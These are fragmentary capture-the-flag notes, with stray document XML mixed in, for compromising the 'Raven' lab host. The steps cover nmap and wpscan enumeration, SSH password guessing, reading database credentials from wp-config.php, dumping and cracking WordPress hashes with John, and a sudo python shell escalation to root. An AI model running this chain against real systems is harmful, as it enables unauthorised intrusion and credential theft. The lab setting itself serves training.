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.1.11sshNmap -sn 192.168.1.0/24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Nmap -A 192.168.1.110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80/tcp open http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Http-title: Raven Security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Host: TARGET1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3.  Firefox: 192.168.1.110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192.168.1.110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blog: 192.168.1.110/wordpress/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4. Wpscan --url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http://192.168.1.110/wordpress/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --wp-content-dir -ep -eu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Users: michael, steven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5. Ssh michael@192.168.1.110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Pw: michael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6. Cd /var/www/html/wordpress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wp-config.php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DB_USER user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DB_PASSWORD R@v3nSecurity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7. Mysql -u root -p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 R@v3nSecurity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wordpress;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wp_users;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Seven Seagull hash revealed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\T mysql_hash_passwords.txt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wp_users;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8. scp michael@192.168.1.110:~/msqyl_hash_passwords.txt /~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9. Echo ‘steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/’ &gt; hashdump.txt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10. seJohn /usr/share/wordlists/rockyou.txt ./hashdump.txt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Pw: pink84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11. Ssh steven@192.168.1.110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pw: pink84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12. root:</w:t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su steven</w:t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sudo –l</w:t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sudo python –c 'import pty;pty.spawn("/bin/bash")'</w:t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root@target1:/#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13. find / -name “flag*.txt”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/var/www/flag2.txt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/root/flag4.txt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14. /var/www/flag2.txt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15. Flag 1: michael@target1:/var/www/html$ grep flag service.html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16. Flag 3: michal mysql wp_posts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168.1.110/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